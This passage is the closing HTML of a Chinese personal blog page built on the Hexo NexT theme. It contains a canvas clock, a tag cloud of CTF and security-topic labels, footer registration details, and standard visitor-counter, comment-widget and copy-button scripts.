  			for(var y = 0;y<numMatrix.length;y++){
  				for(var x = 0;x<numMatrix[y].length;x++){
  					if(numMatrix[y][x]==1){
  						cxt.beginPath();
  						cxt.arc(offsetX+RADIUS+RADIUS*2*x,offsetY+RADIUS+RADIUS*2*y,RADIUS,0,2*Math.PI);
  						cxt.fill();
  					}
  				}
  			}
  			cxt.beginPath();
  			offsetX += numMatrix[0].length*RADIUS*2;
  			return offsetX;
  		}

  		var canvas = document.getElementById("canvas");
  		canvas.width=WINDOW_WIDTH;
  		canvas.height=WINDOW_HEIGHT;
  		context = canvas.getContext("2d");

  		//记录当前绘制的时刻
  		var currentDate = new Date();

  		setInterval(function(){
  			//清空整个Canvas，重新绘制内容
  			context.clearRect(0, 0, context.canvas.width, context.canvas.height);
  			drawDatetime(context);
  		}, 50)
})();
</script>


      


<!--添加标签云-->
        
          <script type="text/javascript" charset="utf-8" src="/js/tagcloud.js"></script>
          <script type="text/javascript" charset="utf-8" src="/js/tagcanvas.js"></script>
          <div class="widget-wrap">
            <div>标签云</div>
            <div id="myCanvasContainer" class="widget tagcloud">
              <canvas width="250" height="250" id="resCanvas" style="width=100%">
              <ul class="tag-list" itemprop="keywords"><li class="tag-list-item"><a class="tag-list-link" href="/tags/C/" rel="tag">C</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/CTF/" rel="tag">CTF</a><span class="tag-list-count">67</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/HTTP%E5%A4%B4%E9%83%A8%E4%BF%A1%E6%81%AF%E5%88%86%E6%9E%90/" rel="tag">HTTP头部信息分析</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/PHP%E4%BC%AA%E5%8D%8F%E8%AE%AE/" rel="tag">PHP伪协议</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/PHP%E7%89%B9%E6%80%A7/" rel="tag">PHP特性</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/RE/" rel="tag">RE</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/SQL/" rel="tag">SQL</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/Web/" rel="tag">Web</a><span class="tag-list-count">13</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/Web%E5%B7%A5%E5%85%B7%E5%8C%85/" rel="tag">Web工具包</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/awd/" rel="tag">awd</a><span class="tag-list-count">2</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/bugctf/" rel="tag">bugctf</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/ctfshow/" rel="tag">ctfshow</a><span class="tag-list-count">3</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/misc/" rel="tag">misc</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/next%E4%B8%BB%E9%A2%98%E5%A4%B1%E6%95%88/" rel="tag">next主题失效</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/sqlmap/" rel="tag">sqlmap</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/web/" rel="tag">web</a><span class="tag-list-count">2</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/wp/" rel="tag">wp</a><span class="tag-list-count">2</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/xss/" rel="tag">xss</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/xxe/" rel="tag">xxe</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E4%B8%8D%E8%92%9C%E5%AD%90%E4%B8%8D%E6%98%BE%E7%A4%BA/" rel="tag">不蒜子不显示</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E5%8D%9A%E5%AE%A2/" rel="tag">博客</a><span class="tag-list-count">5</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E5%8D%9A%E5%AE%A2%E4%B8%BB%E9%A2%98%E4%BC%98%E5%8C%96/" rel="tag">博客主题优化</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E5%8D%9A%E5%AE%A2%E6%AD%BB%E5%BE%AA%E7%8E%AF%E6%A1%86%E6%9E%B6%E9%97%AE%E9%A2%98/" rel="tag">博客死循环框架问题</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E5%8D%9A%E5%AE%A2%E9%83%A8%E5%88%86%E9%97%AE%E9%A2%98%E8%A7%A3%E5%86%B3%E6%96%B9%E6%B3%95/" rel="tag">博客部分问题解决方法</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/" rel="tag">反序列化</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C/" rel="tag">命令执行</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E5%B1%80%E5%9F%9F%E7%BD%91%E6%94%BB%E5%87%BB/" rel="tag">局域网攻击</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E5%B8%B8%E7%94%A8%E6%8C%87%E4%BB%A4/" rel="tag">常用指令</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E5%BF%83%E5%BE%97/" rel="tag">心得</a><span class="tag-list-count">2</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E/" rel="tag">文件上传漏洞</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/" rel="tag">文件包含</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E6%B5%81%E9%87%8F%E5%88%86%E6%9E%90/" rel="tag">流量分析</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E6%B8%97%E9%80%8F/" rel="tag">渗透</a><span class="tag-list-count">4</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/" rel="tag">渗透测试</a><span class="tag-list-count">5</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/" rel="tag">漏洞复现</a><span class="tag-list-count">3</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E7%95%99%E8%A8%80%E6%9D%BF/" rel="tag">留言板</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E8%B5%9B%E5%90%8E%E5%A4%8D%E7%9B%98/" rel="tag">赛后复盘</a><span class="tag-list-count">52</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E9%BB%91%E7%9B%92%E6%B5%8B%E8%AF%95/" rel="tag">黑盒测试</a><span class="tag-list-count">1</span></li></ul>
              </canvas>
            </div>
         </div>
        
	  



 
	  
	  


   </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        
  <div class="beian"><a href="https://beian.miit.gov.cn/" rel="noopener" target="_blank">豫ICP备2022003011号-1 </a>
      <img src="/images/beian.png" style="display: inline-block;"><a href="http://www.beian.gov.cn/portal/registerSystemInfo?recordcode=%E8%B1%AB%E5%85%AC%E7%BD%91%E5%AE%89%E5%A4%87%2041142602000197%E5%8F%B7" rel="noopener" target="_blank">豫公网安备 41142602000197号 </a>
  </div>


<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2023</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
   </span>
  <span class="author" itemprop="copyrightHolder">故里</span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-chart-area"></i>
    </span>
    <span title="站点总字数">1m</span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-coffee"></i>
    </span>
    <span title="站点阅读时长">15:40</span>
</div>







<section class="footer-time">
    <span class="footer__copyright">
    <div>
    <span id="span_dt_dt"> </span>
    <script language="javascript">
      function show_date_time(){
        window.setTimeout("show_date_time()", 1000);
        BirthDay=new Date("12/25/2021 10:56:12");//这个日期是可以修改的
        today=new Date();
        timeold=(today.getTime()-BirthDay.getTime());//其实仅仅改了这里
        sectimeold=timeold/1000
        secondsold=Math.floor(sectimeold);
        msPerDay=24*60*60*1000
        e_daysold=timeold/msPerDay
        daysold=Math.floor(e_daysold);
        e_hrsold=(e_daysold-daysold)*24;
        hrsold=Math.floor(e_hrsold);
        e_minsold=(e_hrsold-hrsold)*60;
        minsold=Math.floor((e_hrsold-hrsold)*60);
        seconds=Math.floor((e_minsold-minsold)*60);
        span_dt_dt.innerHTML="我已在此等候你 "+daysold+" 天 "+hrsold+" 小时 "+minsold+" 分 "+seconds+" 秒";
      }
      show_date_time();
    </script>
    </div>
	
	




<!--这一段是不蒜子的访问量统计代码-->
<script async src="http://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
我的第<span id="busuanzi_value_site_uv"></span>位朋友
历经<span id="busuanzi_value_site_pv"></span>次回眸才与你相遇</span>

	 
	 
	 

<a target="_blank" rel="noopener" href="https://www.upyun.com/?utm_source=lianmeng&amp;utm_medium=referra"><img src="https://z4a.net/images/2022/05/31/image649ac1128183cf97.png"align="absmiddle" width="59px" height="30px" /></a>



        
<div class="busuanzi-count">
  <script data-pjax async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    <span class="post-meta-item" id="busuanzi_container_site_uv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="user"></i>
      </span>
      <span class="site-uv" title="总访客量">
        <span id="busuanzi_value_site_uv"></span>
      </span>
    </span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item;">
      <span class="post-meta-item-icon">
        <i class="eye"></i>
      </span>
      <span class="site-pv" title="总访问量">
      </span>
    </span>
</div>








      </div>
    </footer>
  </div>

  


  
  

  
  <script color='255,255,225' opacity='0.5' zIndex='-1' count='99' src="/lib/canvas-nest/canvas-nest.min.js"></script>
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/pjax/pjax.min.js"></script>
  <script src="//img.hzy2003628.top/busuanzi/jquery.min.js"></script>
  <script src="//img.hzy2003628.top/busuanzi/jquery.fancybox.min.js"></script>

<script src="/js/utils.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>

  <script>
var pjax = new Pjax({
  selectors: [
    'head title',
    '#page-configurations',
    '.content-wrap',
    '.post-toc-wrap',
    '.languages',
    '#pjax'
  ],
  switches: {
    '.post-toc-wrap': Pjax.switches.innerHTML
  },
  analytics: false,
  cacheBust: false,
  scrollTo : !CONFIG.bookmark.enable
});

window.addEventListener('pjax:success', () => {
  document.querySelectorAll('script[data-pjax], script#page-configurations, #pjax script').forEach(element => {
    var code = element.text || element.textContent || element.innerHTML || '';
    var parent = element.parentNode;
    parent.removeChild(element);
    var script = document.createElement('script');
    if (element.id) {
      script.id = element.id;
    }
    if (element.className) {
      script.className = element.className;
    }
    if (element.type) {
      script.type = element.type;
    }
    if (element.src) {
      script.src = element.src;
      // Force synchronous loading of peripheral JS.
      script.async = false;
    }
    if (element.dataset.pjax !== undefined) {
      script.dataset.pjax = '';
    }
    if (code !== '') {
      script.appendChild(document.createTextNode(code));
    }
    parent.appendChild(script);
  });
  NexT.boot.refresh();
  // Define Motion Sequence & Bootstrap Motion.
  if (CONFIG.motion.enable) {
    NexT.motion.integrator
      .init()
      .add(NexT.motion.middleWares.subMenu)
      .add(NexT.motion.middleWares.postList)
      .bootstrap();
  }
  NexT.utils.updateSidebarPosition();
});
</script>




  
  <script data-pjax>
    (function(){
      var canonicalURL, curProtocol;
      //Get the <link> tag
      var x=document.getElementsByTagName("link");
		//Find the last canonical URL
		if(x.length > 0){
			for (i=0;i<x.length;i++){
				if(x[i].rel.toLowerCase() == 'canonical' && x[i].href){
					canonicalURL=x[i].href;
				}
			}
		}
    //Get protocol
	    if (!canonicalURL){
	    	curProtocol = window.location.protocol.split(':')[0];
	    }
	    else{
	    	curProtocol = canonicalURL.split(':')[0];
	    }
      //Get current URL if the canonical URL does not exist
	    if (!canonicalURL) canonicalURL = window.location.href;
	    //Assign script content. Replace current URL with the canonical URL
      !function(){var e=/([http|https]:\/\/[a-zA-Z0-9\_\.]+\.baidu\.com)/gi,r=canonicalURL,t=document.referrer;if(!e.test(r)){var n=(String(curProtocol).toLowerCase() === 'https')?"https://sp0.baidu.com/9_Q4simg2RQJ8t7jm9iCKT-xh_/s.gif":"//api.share.baidu.com/s.gif";t?(n+="?r="+encodeURIComponent(document.referrer),r&&(n+="&l="+r)):r&&(n+="?l="+r);var i=new Image;i.src=n}}(window);})();
  </script>




  
<script src="/js/local-search.js"></script>















    <div id="pjax">
  

  


  

  <script src="/js/activate-power-mode.min.js"></script>
  <script>
    POWERMODE.colorful = true;
    POWERMODE.shake = false;
    document.body.addEventListener('input', POWERMODE);
  </script>


<script>
NexT.utils.loadComments(document.querySelector('#valine-comments'), () => {
  NexT.utils.getScript('//unpkg.com/valine/dist/Valine.min.js', () => {
    var GUEST = ['nick', 'mail', 'link'];
    var guest = 'nick,mail,link';
    guest = guest.split(',').filter(item => {
      return GUEST.includes(item);
    });
    new Valine({
      el         : '#valine-comments',
      verify     : false,
      notify     : true,
      appId      : 'kkHz96fwDwdnhN10VTUS0KUx-gzGzoHsz',
      appKey     : '3th47KWUKTQ2oX3tNXqz6WQW',
      placeholder: "来留下你的痕迹吧",
      avatar     : 'retro',
      meta       : guest,
      pageSize   : '10' || 10,
      visitor    : true,
      lang       : '' || 'zh-cn',
      path       : location.pathname,
      recordIP   : true,
      serverURLs : ''
    });
  }, window.Valine);
});
</script>

    </div>




  <style>
    .copy-btn {
      display: inline-block;
      padding: 6px 12px;
      font-size: 13px;
      font-weight: 700;
      line-height: 20px;
      color: #333;
      white-space: nowrap;
      vertical-align: middle;
      cursor: pointer;
      background-color: #eee;
      background-image: linear-gradient(#fcfcfc, #eee);
      border: 1px solid #d5d5d5;
      border-radius: 3px;
      user-select: none;
      outline: 0;
    }

    .highlight-wrap .copy-btn {
      transition: opacity .3s ease-in-out;
      opacity: 0;
      padding: 2px 6px;
      position: absolute;
      right: 4px;
      top: 8px;
    }

    .highlight-wrap:hover .copy-btn,
    .highlight-wrap .copy-btn:focus {
      opacity: 1
    }

    .highlight-wrap {
      position: relative;
    }
  </style>
  
  <script>
    $('.highlight').each(function (i, e) {
      var $wrap = $('<div>').addClass('highlight-wrap')
      $(e).after($wrap)
      $wrap.append($('<button>').addClass('copy-btn').append('复制').on('click', function (e) {
        var code = $(this).parent().find('.code').find('.line').map(function (i, e) {
          return $(e).text()
        }).toArray().join('\n')
        var ta = document.createElement('textarea')
        document.body.appendChild(ta)
        ta.style.position = 'absolute'
        ta.style.top = '0px'
        ta.style.left = '0px'
        ta.value = code
        ta.select()
        ta.focus()
        var result = document.execCommand('copy')
        document.body.removeChild(ta)
        
          if(result)$(this).text('复制成功')
          else $(this).text('复制失败')
        
        $(this).blur()
      })).on('mouseleave', function (e) {
        var $b = $(this).find('.copy-btn')
        setTimeout(function () {
          $b.text('复制')
        }, 300)
      }).append(e)
    })
  </script>







</body>
</html>



<script type="text/javascript" src="/js/love.js"></script>




<script type="text/javascript">
    var OriginTitile=document.title,st;
	document.addEventListener("visibilitychange",function(){
        document.hidden?(document.title="ヽ(●-`Д´-)ノ网页崩溃了",clearTimeout(st)):(document.title="(Ő∀Ő3)ノ骗你的，别走了！",st=setTimeout(function(){document.title=OriginTitile},3e3))
    })
</script>


